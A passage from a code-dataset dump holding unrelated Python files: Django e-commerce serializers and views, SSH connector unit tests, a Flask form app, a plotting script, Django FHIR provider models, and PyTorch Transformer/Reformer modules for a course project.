RecentlySearchedKeywordSerializer(serializers.ModelSerializer):\n    class Meta:\n        model = RecentlySearchedKeyword\n        fields = ['id', 'keyword']\n\nclass PopularTempKeywordSerializer(serializers.ModelSerializer):\n    class Meta:\n        model = PopularTempKeyword\n        fields = ['id', 'keyword']\n\n\nclass SearchDefaultSerializer(serializers.Serializer):\n    popular_keywords = serializers.SerializerMethodField()\n    searched_keywords = serializers.SerializerMethodField()\n\n    class Meta:\n        fields = ['popular_keywords', 'searched_keywords']\n\n    # SerializerMethodField passes the serialized object, so these methods need an obj argument\n    def get_popular_keywords(self, obj):\n        qs = PopularTempKeyword.objects.filter(is_active=True)[:3]\n        serializer = PopularTempKeywordSerializer(qs, many=True)\n        return serializer.data\n\n    def get_searched_keywords(self, obj):\n        user = self.context['request'].user\n        if user.is_anonymous:\n            return None\n        qs = user.recently_searched_keywords.order_by('-updated_at')\n        serializer = RecentlySearchedKeywordSerializer(qs, many=True)\n        return serializer.data","sub_path":"siiot/products/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":23130,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
+{"seq_id":"254848099","text":"import os\n\nfrom mimetypes import guess_type\n\nfrom django.conf import settings\nfrom django.contrib import messages\nfrom django.core.paginator import Paginator, EmptyPage, PageNotAnInteger\nfrom django.shortcuts import render_to_response, RequestContext, Http404, HttpResponseRedirect, get_object_or_404\nfrom django.http import HttpResponseForbidden\nfrom django.template.defaultfilters import slugify\nfrom django.forms.models import modelformset_factory\nfrom django.core.urlresolvers import reverse\nfrom django.db.models import Q\n\nfrom .models import Product, Category, ProductImage, Comment, Coupon\nfrom .forms import ProductForm, ProductImageForm, CommentForm, CouponForm, ProductImageFormSet\nfrom .helpers import product_url\n# create a list of all products to display 
it on all products page\ndef list_all(request):\n title = \"All Products\"\n products = Product.listing()\n return _all_products_page(request, locals())\n# search for products and display search results\ndef search_products(request):\n query = request.GET['query']\n products = Product.listing().filter(Q(description__icontains=query) | Q(title__icontains=query) | Q(headline__icontains=query) | Q(author__icontains=query) | Q(isbn_number__icontains=query))\n title = \"Products matching \\\"\" + query + \"\\\"\"\n return _all_products_page(request, locals())\n# create a list of categories to display products by categories\ndef category(request, slug):\n category = Category.objects.get(slug=slug)\n title = \"Products in \\\"\" + category.title + \"\\\"\"\n products = Product.listing().filter(category=category)\n return _all_products_page(request, locals())\n# render the all products page with categories, pagination, and sorting by price.\ndef _all_products_page(request, context):\n categories = Category.objects.all()\n order = _order(request)\n page = _paginate(context['products'].order_by(order), request)\n context.update(locals())\n return render_to_response(\"products/all.html\",\n context,\n context_instance=RequestContext(request))\n# create new products\ndef add_product(request):\n form = ProductForm(request.POST or None, request.FILES or None)\n image_form = ProductImageForm(request.POST or None, request.FILES or None)\n\n if form.is_valid() and image_form.is_valid():\n product = form.save(commit=False)\n product.user = request.user\n product.slug = slugify(form.cleaned_data['title'])\n product.save()\n image = image_form.save(commit=False)\n image.product = product\n image.featured_image = True\n image.save()\n return HttpResponseRedirect(product_url(product))\n\n return render_to_response(\"products/edit.html\", locals(), context_instance=RequestContext(request))\n# manage the product's images\ndef manage_product_image(request, id):\n product = Product.objects.get(id=id)\n\n if request.user != product.user:\n raise Http404\n\n # this queries the images and ensures that the correct image is selected\n queryset = ProductImage.objects.filter(product__id=id)\n formset = ProductImageFormSet(request.POST or None, request.FILES or None, queryset=queryset)\n\n if request.method == 'POST' and formset.is_valid():\n images = formset.save(commit=False)\n for image in images:\n image.product = product\n image.save()\n return HttpResponseRedirect(reverse('manage_product_image', args=[product.id]))\n\n return render_to_response(\"products/manage_images.html\", locals(), context_instance=RequestContext(request))\n# edit already created products.\ndef edit_product(request, id):\n instance = Product.objects.get(id=id)\n # this conditional ensures that only the product owners can edit the product,\n # any other user trying to access the edit form will be shown a 404 error\n if request.user != instance.user:\n raise Http404\n\n form = ProductForm(request.POST or None, request.FILES or None, instance=instance)\n\n if request.method == 'POST':\n try:\n form.save()\n messages.success(request, 'Product updated')\n return HttpResponseRedirect(reverse('listings'))\n except ValueError:\n pass\n\n return render_to_response(\"products/edit.html\", locals(), context_instance=RequestContext(request))\n# view single product listings\ndef single(request, id, slug):\n product = Product.objects.get(id=id, slug=slug)\n images = product.productimage_set.all()\n comment_form = CommentForm(request.POST)\n comments = 
Comment.objects.filter(product=product)\n\n    if request.user.is_authenticated():\n        downloadable = request.user.has_purchased(product)\n\n    edit = True\n\n    return render_to_response(\"products/single.html\", locals(), context_instance=RequestContext(request))\n# activate products after creation\ndef activate_product(request, id):\n    product = Product.objects.get(id=id)\n    product.status = Product.ACTIVE\n    product.save()\n    return HttpResponseRedirect(reverse('listings'))\n# deactivate products\ndef deactivate_product(request, id):\n    product = Product.objects.get(id=id)\n    product.status = Product.INACTIVE\n    product.save()\n    return HttpResponseRedirect(reverse('listings'))\n# add comments on single product page\ndef comment(request, id):\n    product = Product.objects.get(id=id)\n    if request.method == 'POST':\n        try:\n            comment = CommentForm(request.POST, instance=Comment(product=product, user=request.user))\n            comment.save()\n        except ValueError: # handle validation errors\n            return render_to_response(\"products/single.html\", locals(), context_instance=RequestContext(request))\n\n    return HttpResponseRedirect(product_url(product))\n# manage coupons associated with a product\ndef manage_coupons(request, id):\n    product = Product.objects.get(id=id)\n\n    if request.user != product.user:\n        raise Http404\n\n    # Products are filled in at this stage instead of just before save(), so that\n    # we can have a validation depending on it (see CouponForm#clean_discount).\n    params = fill_in_product_id(request.POST, product.pk)\n\n    queryset = Coupon.objects.filter(product=product)\n    CouponFormset = modelformset_factory(Coupon, form=CouponForm, can_delete=True)\n    formset = CouponFormset(params or None, queryset=queryset)\n\n    if request.method == 'POST' and formset.is_valid():\n        try:\n            coupons = formset.save(commit=False)\n            for coupon in coupons:\n                # Make sure the user is creating a coupon for her own product.\n                if coupon.product.user != request.user:\n                    return HttpResponseForbidden()\n                coupon.save()\n            return HttpResponseRedirect(reverse('manage_coupons', args=[product.id]))\n        except ValueError: # handle validation errors\n            pass\n\n    return render_to_response(\"products/manage_coupons.html\", locals(), context_instance=RequestContext(request))\n# escrow process: allowing users to mark a bought product as received\ndef mark_as_received(request, id):\n    product = get_object_or_404(Product, id=id)\n\n    # Only the buyer should be able to do that.\n    if product.purchase.user != request.user:\n        return HttpResponseForbidden()\n\n    product.status = Product.RECEIVED\n    product.save()\n\n    return HttpResponseRedirect(reverse('mypurchases'))\n\ndef fill_in_product_id(params, product_id):\n    params = params.copy()\n\n    for i in range(int(params.get('form-MAX_NUM_FORMS', 0))):\n        if params.get('form-%s-discount' % i):\n            params['form-%s-product' % i] = product_id\n        else:\n            break\n\n    return params\n# ability to sort by price\ndef _order(request):\n    order = request.GET.get('order')\n    if order in ['price', '-price']:\n        return order\n    return 'price' # the default sorting order\n# allow users to paginate and set pagination threshold to 15\ndef _paginate(products, request):\n    paginator = Paginator(products, 15)\n\n    page = request.GET.get('page')\n    try:\n        return paginator.page(page)\n    except PageNotAnInteger:\n        # If page is not an integer, deliver first page.\n        return paginator.page(1)\n    except EmptyPage:\n        # If page is out of range (e.g. 
9999), deliver last page of results.\n return paginator.page(paginator.num_pages)\n","sub_path":"products/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":8304,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"293340619","text":"import logging\nimport unittest\nimport os\nfrom zensols.hostcon import Connector, AppConfig\n\nlogging.basicConfig(level=logging.INFO)\nlogger = logging.getLogger('zensols.hostcon.test')\n\n\nclass TestConnector(unittest.TestCase):\n def setUp(self):\n self.conf = AppConfig('test-resources/test.conf')\n self.conf2 = AppConfig('test-resources/test2.conf')\n self.conf_mnt = AppConfig('test-resources/test-mount.conf')\n self.defparams = {'ssh_switches': '-X -Y',\n 'host_name': 'host1',\n 'ssh_port': '20',\n 'user_name': 'u1'}\n\n def params(self, to_update):\n params = self.defparams.copy()\n params.update(to_update)\n return params\n\n def test_domain(self):\n conn = Connector(self.conf, 'host1.example.com', user_name='u1')\n params = conn.get_params()\n update = {'ssh_port': '23', 'host_name': 'host1.example.com'}\n self.assertEqual(self.params(update), params)\n\n def test_var_subs(self):\n conn = Connector(self.conf, 'host3.example.com', user_name='u1')\n os.environ['HOSTCON_TEST_VAR'] = 'hostcon_test_var'\n params = conn.get_params()\n self.assertEqual(self.params({'host_name': 'hostcon_test_var', 'ssh_port': '26'}), params)\n\n def test_no_domain(self):\n conn = Connector(self.conf, 'host1', user_name='u1')\n params = conn.get_params()\n self.assertEqual(self.params({'ssh_port': '24'}), params)\n\n def test_domain_no_host(self):\n conn = Connector(self.conf, 'host-nonexists')\n params = conn.get_params()\n ssh_port = params['ssh_port']\n self.assertEqual('22', ssh_port)\n\n def test_host_alias(self):\n conn = Connector(self.conf, 'host2.example.com', user_name='u1')\n params = conn.get_params()\n self.assertEqual(self.params({'host_name': 'otherhost', 'ssh_port': '25'}), params)\n\n def test_user_override(self):\n conn = Connector(self.conf2, 'host3.example.com', user_name='otheruser')\n params = conn.get_params()\n correct = self.params({'user_name': 'otheruser', 'ssh_switches': None})\n self.assertEqual(correct, params)\n\n def test_commands(self):\n conn = Connector(self.conf, 'host2.example.com', user_name='usr')\n self.assertEqual(['ssh -X -Y -f -p 25 usr@otherhost /usr/bin/xterm'], conn.get_commands('xterm'))\n self.assertEqual(['ssh -X -Y -f -p 25 usr@otherhost /usr/local/emacs/bin/emacs'], conn.get_commands('emacs'))\n self.assertEqual(['ssh -X -Y -p 25 usr@otherhost'], conn.get_commands('login'))\n\n def test_commands_no_alias(self):\n conn = Connector(self.conf2, 'host2.example.com', user_name='u')\n self.assertEqual(['ssh -f -p 25 u@otherhost /usr/bin/xterm'], conn.get_commands('xterm'))\n\n def test_mount_params(self):\n conn = Connector(self.conf_mnt, 'host1.example.com', user_name='u1')\n params = conn.get_params()\n params.update(conn.get_params(section_prefix='m1', command_keys=conn.mount_keys))\n update = {'remote_mount_point': 'rmp',\n 'local_mount_point': 'lmp',\n 'host_name': 'host1.example.com'}\n self.assertEqual(self.params(update), params)\n\n def test_mount(self):\n conn = Connector(self.conf_mnt, 'host2.example.com', user_name='u1')\n cmds = ['sshfs u1@host2.example.com:rmp lmp -oport=20,mnt_opts,volname=m1',\n 'sshfs u1@host2.example.com:rmp2 lmp2 -oport=20,mnt_opts,volname=m2']\n self.assertEqual(cmds, 
conn.get_commands('mount'))\n","sub_path":"test/python/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":3600,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"600125540","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[ ]:\nimport os\n\nfrom flask import Flask, redirect, url_for, render_template, request, flash\nfrom load_model import find_if_dropout\n\napp = Flask(__name__)\n@app.route('/')\ndef home():\n return render_template(\"main.html\")\n\n@app.route('/res', methods = ['GET','POST'])\ndef my_form_post():\n ar_1 = request.form['income']\n ar_2 = request.form['disability']\n ar_3 = request.form['class']\n ar_4 = request.form['m1']\n ar_5 = request.form['m2']\n ar_6 = request.form['m3']\n ar_7 = request.form['attendence']\n\n ar = [[ar_1, ar_2, ar_3, ar_4, ar_5, ar_6, ar_7]]\n\n result = find_if_dropout(*ar)\n return render_template(\"res.html\", r=result)\n\nif __name__==\"__main__\":\n app.run(debug=True)\n\n\n\n\n","sub_path":"web.py","file_name":"web.py","file_ext":"py","file_size_in_byte":757,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"353119083","text":"import matplotlib.pyplot as plt\nimport csv\n\nwith open('results/step2_results_la_republica.csv', 'rt', encoding=\"utf8\") as csvfile:\n reader = csv.DictReader(csvfile)\n y_total_news = []\n x_months = []\n x_ticks = [] \n contador = 0 \n for row in reader:\n y_total_news.append(float(row['epu_news_rel']))\n x_months.append(row['date']) \n x_ticks.append(contador) \n contador += 1\n\n print (\"genero la grafica \\n\")\n # y_total_news.sort()\n plt.plot(x_months , y_total_news) \n plt.title('EPU para ' + row['newspaper'])\n plt.axis([\"10-2011\",\"10-2014\", 0, 0.015])\n plt.show()","sub_path":"baker/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":643,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"589352807","text":"# -*- coding: utf-8 -*-\r\nimport unittest\r\nfrom Regression_Case import MarkCreate_Automation as Automation_Case\r\nimport sys\r\n\r\nlist = unittest.TestLoader().getTestCaseNames(Automation_Case)\r\ntestCaseParse = sys.argv[1]\r\ndiffstr = ''\r\nchangeLine = '\\r\\n'\r\nfor index in list:\r\n\tif testCaseParse in index:\r\n\t\tstr = \" def \" + index + \"(self):\" + changeLine\r\n\t\tstr = str + \" Automation_Case.\" + index + \"(self)\" + changeLine + changeLine\r\n\t\tdiffstr = diffstr + str\r\n\r\n\r\n\r\n# PG_regression_test.py PG_regression_tmp.txt\r\n\r\nwith open('PG_regression_tmp.txt', 'r') as file:\r\n\tfiledata = file.read()\r\n\r\nfiledata = filedata.replace('@@@diff@@@', diffstr)\r\n\r\nwith open('PG_regression_test.py', 'w') as file:\r\n\tfile.write(filedata)\r\n\r\nfile.close()\r\n\r\n","sub_path":"PGTransfer.py","file_name":"PGTransfer.py","file_ext":"py","file_size_in_byte":748,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"86495264","text":"from __future__ import absolute_import\nfrom __future__ import unicode_literals\nfrom django.db import models\nfrom django.utils.encoding import python_2_unicode_compatible\nimport json\nfrom django.contrib.auth.models import User\nfrom collections import OrderedDict\nfrom .utils import get_practitioner, get_pecos_individual_affliliation\n\n\n@python_2_unicode_compatible\nclass Address(models.Model):\n npi = models.CharField(max_length=10, default=\"\",\n blank=True)\n fhir_json_snipit = 
models.TextField(max_length=2000, default=\"\")\n\n\n    def __str__(self):\n        try:\n            j = json.loads(self.fhir_json_snipit)\n            address = \"\"\n            for l in j['line']:\n                address = address + l + \" \"\n\n            address = address + \" \" + j['city'] + \" \" + j['state'] + \" \" \\\n                      + j['postalCode'] + \" \" + j['country'] + \\\n                      \" (\" + j['use'] + \")\"\n            return address\n\n        except ValueError:\n            return \"%s\" % (self.id)\n        except:\n            return \"%s\" % (self.id)\n    def as_dict(self):\n        result = {}\n        try:\n            j = json.loads(self.fhir_json_snipit)\n            result['line_1'] = j['line'][0]\n            result['line_2'] = j['line'][1]\n            result['city'] = j['city']\n            result['state'] = j['state']\n            result['postal_code'] = j['postalCode']\n            result['use'] = j['use']\n            result['country'] = j['country']\n            return result\n        except:\n            return {}\n\n\n    def line_1(self):\n        try:\n            j = json.loads(self.fhir_json_snipit)\n            line = j['line'][0]\n            return line\n        except:\n            return \"\"\n    def line_2(self):\n        try:\n            j = json.loads(self.fhir_json_snipit)\n            line = j['line'][1]\n            return line\n        except:\n            return \"\"\n\n\n\n    def city(self):\n        try:\n            j = json.loads(self.fhir_json_snipit)\n            return j['city']\n        except:\n            return \"\"\n\n    def state(self):\n        try:\n            j = json.loads(self.fhir_json_snipit)\n            return j['state']\n        except:\n            return \"\"\n\n\n    def postal_code(self):\n        try:\n            j = json.loads(self.fhir_json_snipit)\n            return j['postalCode']\n        except:\n            return \"\"\n    def country(self):\n        try:\n            j = json.loads(self.fhir_json_snipit)\n            return j['country']\n        except:\n            return \"\"\n\n    def use(self):\n        try:\n            j = json.loads(self.fhir_json_snipit)\n            return j['use']\n        except:\n            return \"\"\n\n\n\n@python_2_unicode_compatible\nclass Taxonomy(models.Model):\n    npi = models.CharField(max_length=10, default=\"\",\n                           blank=True)\n    fhir_json_snipit = models.TextField(max_length=2000, default=\"\")\n\n\n    def __str__(self):\n        return \"%s\" % (self.id)\n\n@python_2_unicode_compatible\nclass License(models.Model):\n    npi = models.CharField(max_length=10, default=\"\",\n                           blank=True)\n    fhir_json_snipit = models.TextField(max_length=2000, default=\"\")\n\n\n    def __str__(self):\n        return \"%s\" % (self.id)\n\n@python_2_unicode_compatible\nclass Affiliation(models.Model):\n    npi = models.CharField(max_length=10, default=\"\",\n                           blank=True)\n    fhir_json_snipit = models.TextField(max_length=2000, default=\"\")\n\n\n    def __str__(self):\n        return \"%s\" % (self.id)\n\n    def as_dict(self):\n        result = {}\n        try:\n            j = json.loads(self.fhir_json_snipit)\n            result['line_1'] = j['line'][0]\n            result['line_2'] = j['line'][1]\n            result['city'] = j['city']\n            result['state'] = j['state']\n            result['postal_code'] = j['postalCode']\n            result['use'] = j['use']\n            result['country'] = j['country']\n            return result\n        except:\n            return {}\n\n    # renamed from npi: a method with that name would shadow the npi model field declared above\n    def get_npi(self):\n        try:\n            j = json.loads(self.fhir_json_snipit)\n            return j['npi']\n        except:\n            return \"\"\n\n\n    def postal_code(self):\n        try:\n            j = json.loads(self.fhir_json_snipit)\n            return j['postalCode']\n        except:\n            return \"\"\n\n\n\n@python_2_unicode_compatible\nclass Practitioner(models.Model):\n    user = models.ForeignKey(User, blank=True, null=True)\n    npi = models.CharField(max_length=10, default=\"\",\n                           unique=True,\n                           )\n    fhir_id = models.CharField(max_length=24, default=\"\",\n                               unique=True,\n                               verbose_name=\"FHIR ID\")\n    first_name = models.CharField(max_length=256, default=\"\",\n                                  blank=True)\n    last_name = models.CharField(max_length=256, default=\"\",\n                                 blank=True)\n    doing_business_as = models.CharField(max_length=256, default=\"\",\n                                         blank=True)\n\n    def __str__(self):\n        return \"%s 
%s\" % (self.first_name, self.last_name)\n\n def name_to_fhir(self):\n names =[ ]\n name = OrderedDict()\n name['given'] = self.first_name\n name['family'] = self.last_name\n names.append(name)\n return names\n\n\n def to_fhir(self):\n pfhir = OrderedDict()\n pfhir.update(get_practitioner(self.npi))\n pfhir.update(get_pecos_individual_affliliation(self.npi))\n\n addresses = Address.objects.filter(npi=self.npi)\n address= []\n for a in addresses:\n address.append(json.loads(a.fhir_json_snipit))\n\n affiliations = Affiliation.objects.filter(npi=self.npi)\n affiliation= []\n for a in affiliations:\n affiliation.append(json.loads(a.fhir_json_snipit))\n\n\n\n #Override our changes\n pfhir['address'] = address\n pfhir['affiliation'] = affiliation\n pfhir['name'] = self.name_to_fhir()\n #Bump the version\n pfhir['meta']['version'] = pfhir['meta']['version'] + 1\n return pfhir\n\n\n def to_fhir_json(self):\n return json.dumps(self.to_fhir(), indent=4)\n\n\n\n@python_2_unicode_compatible\nclass Organization(models.Model):\n npi = models.CharField(max_length=10, default=\"\")\n fhir_id = models.CharField(max_length=24, default=\"\")\n organization_name = models.CharField(max_length=256, default=\"\")\n doing_business_as = models.CharField(max_length=256, default=\"\")\n\n def __str__(self):\n return \"%s\" % (self.organization_name)\n","sub_path":"apps/provider/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":7009,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"559730615","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport math, copy\nimport reformer\nimport util\n\nfrom torch.nn.utils.rnn import pack_padded_sequence, pad_packed_sequence\nfrom torch.autograd import Variable\n\n\n\"\"\"\nCS224N course project model implementation: Transformer\n\"\"\"\n\ndef clones(module, N):\n \"Produce N identical layers.\"\n return nn.ModuleList([copy.deepcopy(module) for _ in range(N)])\n\ndef attention(query, key, value, mask=None, dropout=0.0):\n \"Compute 'Scaled Dot Product Attention'\"\n d_k = query.size(-1)\n scores = torch.matmul(query, key.transpose(-2, -1)) / math.sqrt(d_k)\n\n if mask is not None:\n scores = scores.masked_fill(mask == 0, -1e9)\n p_attn = F.softmax(scores, dim = -1)\n # (Dropout described below)\n p_attn = F.dropout(p_attn, p=dropout)\n return torch.matmul(p_attn, value), p_attn\n\nclass LayerNorm(nn.Module):\n \"Construct a layernorm module (See citation for details).\"\n def __init__(self, features, eps=1e-6):\n super(LayerNorm, self).__init__()\n self.a_2 = nn.Parameter(torch.ones(features))\n self.b_2 = nn.Parameter(torch.zeros(features))\n self.eps = eps\n\n def forward(self, x):\n mean = x.mean(-1, keepdim=True)\n std = x.std(-1, keepdim=True)\n return self.a_2 * (x - mean) / (std + self.eps) + self.b_2\n \nclass SublayerConnection(nn.Module):\n \"\"\"\n A residual connection followed by a layer norm.\n Note for code simplicity we apply the norm first as opposed to last.\n \"\"\"\n def __init__(self, size, dropout):\n super(SublayerConnection, self).__init__()\n self.norm = LayerNorm(size)\n self.dropout = nn.Dropout(dropout)\n\n def forward(self, x, sublayer):\n \"Apply residual connection to any sublayer function that maintains the same size.\"\n return x + self.dropout(sublayer(self.norm(x)))\n\n\nclass PositionwiseFeedForward(nn.Module):\n \"Implements FFN equation.\"\n def __init__(self, d_model, d_ff, dropout=0.1):\n super(PositionwiseFeedForward, self).__init__()\n 
# Torch linears have a `b` by default. \n self.w_1 = nn.Linear(d_model, d_ff)\n self.w_2 = nn.Linear(d_ff, d_model)\n self.dropout = nn.Dropout(dropout)\n\n def forward(self, x):\n return self.w_2(self.dropout(F.relu(self.w_1(x))))\n \nclass MultiHeadedAttention(nn.Module):\n def __init__(self, h, d_model, dropout=0.1):\n \"Take in model size and number of heads.\"\n super(MultiHeadedAttention, self).__init__()\n assert d_model % h == 0\n # We assume d_v always equals d_k\n self.d_k = d_model // h\n self.h = h\n self.p = dropout\n self.linears = clones(nn.Linear(d_model, d_model), 4)\n self.attn = None\n \n def forward(self, query, key, value, mask=None):\n \"Implements Figure 2\"\n if mask is not None:\n # Same mask applied to all h heads.\n mask = mask.unsqueeze(1)\n nbatches = query.size(0)\n \n # 1) Do all the linear projections in batch from d_model => h x d_k \n query, key, value = [l(x).view(nbatches, -1, self.h, self.d_k).transpose(1, 2)\n for l, x in zip(self.linears, (query, key, value))]\n \n # 2) Apply attention on all the projected vectors in batch. \n x, self.attn = attention(query, key, value, mask=mask, dropout=self.p)\n \n # 3) \"Concat\" using a view and apply a final linear. \n x = x.transpose(1, 2).contiguous().view(nbatches, -1, self.h * self.d_k)\n return self.linears[-1](x)\n\nclass PositionalEncoding(nn.Module):\n \"Implement the PE function.\"\n def __init__(self, d_model, dropout, max_len=5000):\n super(PositionalEncoding, self).__init__()\n self.dropout = nn.Dropout(p=dropout)\n \n # Compute the positional encodings once in log space.\n pe = torch.zeros(max_len, d_model)\n position = torch.arange(0, max_len).unsqueeze(1)\n div_term = torch.exp(torch.arange(0, d_model, 2) *\n -(math.log(10000.0) / d_model))\n pe[:, 0::2] = torch.sin(position * div_term)\n pe[:, 1::2] = torch.cos(position * div_term)\n pe = pe.unsqueeze(0)\n self.register_buffer('pe', pe)\n \n def forward(self, x):\n x = x + Variable(self.pe[:, :x.size(1)], requires_grad=False)\n return self.dropout(x)\n\nclass EncoderLayer(nn.Module):\n \"\"\"\n Encoder is made up of two sublayers, self-attn and feed forward (defined below)\n b blocks of cnn sublayers, each with c Conv1d \n \"\"\"\n\n # N=6, d_model=512, d_ff=2048, h=8, dropout=0.1\n def __init__(self, size=512, d_ff=2048, h=8, dropout=0.1, kernel = 7, c = 4):\n super(EncoderLayer, self).__init__()\n self.c = c\n \n self.conv1d = nn.Sequential(\n nn.Conv1d(size, size, kernel, bias=True, padding=kernel//2),\n nn.ReLU()\n )\n \n self.self_attn = MultiHeadedAttention(h, size, dropout)\n self.feed_forward = PositionwiseFeedForward(size, d_ff, dropout)\n self.sublayer = clones(SublayerConnection(size, dropout), self.c + 2)\n self.size = size\n\n def forward(self, x, mask):\n \"Follow Figure 1 (left) for connections.\"\n\n # convolution\n for i in range(self.c):\n x = self.conv1d(x.transpose(1,2))\n #x = torch.max(x, dim=2)\n x = x.transpose(1,2)\n x = self.sublayer[i](x, lambda x: x)\n \n x = self.sublayer[self.c](x, lambda x: self.self_attn(x, x, x, mask))\n return self.sublayer[self.c+1](x, self.feed_forward)\n\nclass TransformerEncoder(nn.Module):\n \"\"\"\n The transformer encoder part described in 'Attention is all you need'\n b blocks of cnn sublayers, each with c Conv1d \n \"\"\"\n def __init__(self, hidden_size, N = 1, c = 4):\n super(TransformerEncoder, self).__init__()\n self.layer = EncoderLayer(size = hidden_size, c = c)\n self.layers = clones(self.layer, N)\n self.norm = LayerNorm(self.layer.size)\n\n def forward(self, x, mask):\n \"\"\"\n 
Pass the input (and mask) through each layer in turn.\n \"\"\"\n\n # haroldmei\n mask = torch.unsqueeze(mask, 1)\n\n for layer in self.layers:\n x = layer(x, mask)\n return self.norm(x)\n\n\n# just copied from BiDAFOutput\nclass Transformer_Output(nn.Module):\n \"\"\"\n \"\"\"\n def __init__(self, hidden_size, drop_prob):\n super(Transformer_Output, self).__init__()\n\n self.transformer = TransformerEncoder(hidden_size, N = 3) \n \n self.att_linear_1 = nn.Linear(4 * hidden_size, 1)\n self.mod_linear_1 = nn.Linear(hidden_size, 1)\n\n self.att_linear_2 = nn.Linear(4 * hidden_size, 1)\n self.mod_linear_2 = nn.Linear(hidden_size, 1)\n\n def forward(self, att, mod, mask):\n # Shapes: (batch_size, seq_len, 1)\n logits_1 = self.att_linear_1(att) + self.mod_linear_1(mod)\n mod_2 = self.transformer(mod, mask)\n logits_2 = self.att_linear_2(att) + self.mod_linear_2(mod_2)\n\n # Shapes: (batch_size, seq_len)\n log_p1 = util.masked_softmax(logits_1.squeeze(), mask, log_softmax=True)\n log_p2 = util.masked_softmax(logits_2.squeeze(), mask, log_softmax=True)\n\n return log_p1, log_p2\n\n\nclass TransformerEncoderLayerEx(nn.Module):\n def __init__(self, d_model, dropout=0.1, c = 4, kernel = 7):\n super(TransformerEncoderLayerEx, self).__init__()\n self.c = c\n\n self.conv1d = [nn.Sequential(\n nn.Conv1d(d_model, d_model, kernel, bias=True, padding=kernel//2).cuda(),\n nn.ReLU()\n )] * self.c\n\n self.norm3 = [nn.modules.transformer.LayerNorm(d_model)] * self.c\n self.dropout3 = [nn.modules.transformer.Dropout(dropout)] * self.c\n\n def forward(self, src, src_mask=None, src_key_padding_mask=None):\n for i in range(self.c):\n src2 = self.conv1d[i](src.transpose(1,2)).transpose(1,2)\n src = src + self.dropout3[i](src2)\n src = self.norm3[i](src)\n\n return src\n\n# just copied from BiDAFOutput\nclass Transformer_OutputEx(nn.Module):\n \"\"\"\n \"\"\"\n def __init__(self, hidden_size, mod_layers, drop_prob):\n super(Transformer_OutputEx, self).__init__()\n self.cnn = TransformerEncoderLayerEx(hidden_size,c=2)\n self.transformer = nn.modules.transformer.TransformerEncoder(\n nn.modules.transformer.TransformerEncoderLayer(hidden_size, 8, dropout=drop_prob), \n mod_layers, \n nn.modules.transformer.LayerNorm(hidden_size)\n )\n \n self.att_linear_1 = nn.Linear(4 * hidden_size, 1)\n self.mod_linear_1 = nn.Linear(hidden_size, 1)\n\n self.att_linear_2 = nn.Linear(4 * hidden_size, 1)\n self.mod_linear_2 = nn.Linear(hidden_size, 1)\n\n def forward(self, att, mod, mask):\n # Shapes: (batch_size, seq_len, 1)\n logits_1 = self.att_linear_1(att) + self.mod_linear_1(mod)\n mod_2 = self.transformer(self.cnn(mod)) #, mask)\n logits_2 = self.att_linear_2(att) + self.mod_linear_2(mod_2)\n\n # Shapes: (batch_size, seq_len)\n log_p1 = util.masked_softmax(logits_1.squeeze(), mask, log_softmax=True)\n log_p2 = util.masked_softmax(logits_2.squeeze(), mask, log_softmax=True)\n\n return log_p1, log_p2\n\n\n\n\"\"\"\nCS224N course project model implementation: Reformer\n\"\"\"\nclass ReformerEncoder(nn.Module):\n \"\"\"\n The Reformer encoder part described in ''\n \"\"\"\n def __init__(self, hidden_size, depth = 12, drop_prob=0.1, bucket_size = 16, max_seq_len=512):\n super(ReformerEncoder, self).__init__()\n self.reformer = reformer.Reformer(\n dim = hidden_size,\n depth = depth,\n bucket_size = bucket_size, \n max_seq_len = max_seq_len,\n heads = 8,\n lsh_dropout = drop_prob,\n causal = False\n ).cuda()\n self.bucket_size = bucket_size\n\n def forward(self, x, mask):\n x = self.reformer(x)\n return x\n\n\n\n# just copied from 
BiDAFOutput\nclass Reformer_Output(nn.Module):\n \"\"\"\n \"\"\"\n def __init__(self, hidden_size, drop_prob):\n super(Reformer_Output, self).__init__()\n\n self.transformer = ReformerEncoder(hidden_size, depth = 1) \n \n self.att_linear_1 = nn.Linear(4 * hidden_size, 1)\n self.mod_linear_1 = nn.Linear(hidden_size, 1)\n\n self.att_linear_2 = nn.Linear(4 * hidden_size, 1)\n self.mod_linear_2 = nn.Linear(hidden_size, 1)\n\n def forward(self, att, mod, mask):\n # Shapes: (batch_size, seq_len, 1)\n logits_1 = self.att_linear_1(att) + self.mod_linear_1(mod)\n mod_2 = self.transformer(mod, mask)\n logits_2 = self.att_linear_2(att) + self.mod_linear_2(mod_2)\n\n # Shapes: (batch_size, seq_len)\n log_p1 = util.masked_softmax(logits_1.squeeze(), mask, log_softmax=True)\n log_p2 = util.masked_softmax(logits_2.squeeze(), mask, log_softmax=True)\n\n return log_p1, log_p2","sub_path":"transformer.py","file_name":"transformer.py","file_ext":"py","file_size_in_byte":11154,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"446520510","text":"# encoding=utf8\n\nimport librosa\nimport numpy as np\nimport random\n\nfrom keras.utils import to_categorical\nfrom keras.preprocessing import image\n\nfrom data_split import SPLIT_SEP\nfrom fe_and_augmentation import Augmentataion, LABEL_INDEX, LEGAL_LABELS\nimport pickle\nimport os\n\nn_classes = len(LEGAL_LABELS)\n\nSAMPLE_RATE = 16000\nSAMPLE_LENGTH = 16000\n\nTEST_LENGTH = 100\n\nEPS = 1e-8\n\nfrom fe_and_augmentation import NOISE, STRETCH, PITCH, SHIFT_TIME\nfrom fe_and_augmentation import SPEC\nfrom fe_and_augmentation import 